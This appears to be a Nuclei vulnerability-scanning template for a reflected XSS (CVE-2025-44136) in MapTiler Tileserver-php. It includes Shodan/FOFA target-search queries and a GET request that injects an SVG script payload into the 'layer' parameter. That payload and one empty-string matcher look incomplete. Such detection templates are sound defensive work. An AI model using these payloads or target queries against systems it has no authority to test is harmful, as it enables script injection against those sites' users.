id: CVE-2025-44136 info: name: MapTiler Tileserver-php v2.0 - Unauthenticated XSS author: 0x_Akoko severity: medium description: | MapTiler Tileserver-php v2.0 contains a reflected XSS caused by unencoded reflection of the GET parameter \"layer\" in an error message, letting unauthenticated attackers execute arbitrary script on victim browsers. impact: | Unauthenticated attackers can execute arbitrary JavaScript in victim browsers, leading to session hijacking or phishing. remediation: | Update to the latest version of MapTiler Tileserver-php. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-44136 - https://github.com/mheranco/CVE-2025-44136 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2025-44136 epss-score: 0.02507 epss-percentile: 0.83116 cwe-id: CWE-79 metadata: verified: true max-request: 1 shodan-query: title:"TileServer-php" fofa-query: title="TileServer-php" tags: cve,cve2025,xss,maptiler,tileserver,vkev http: - method: GET path: - "{{BaseURL}}/tileserver.php/wmts/x/1/1/asd?Request=x&layer=%3Csvg+alert(document.domain)%3E" matchers: - type: dsl dsl: - 'contains_all(body, "","Unknown or not specified dataset")' - 'contains(content_type, "text/html")' - 'status_code == 404' condition: and # digest: 4a0a00473045022100f9d010641646eca0c22ea7c2c52c5092c7e4810bde67b87dccb848aec386a9220220195709fe2c3b76ec9e811aa0c74184edcea59a2742d14f468fd847ef022d1d63:922c64590222798bb761d5b6d8e72950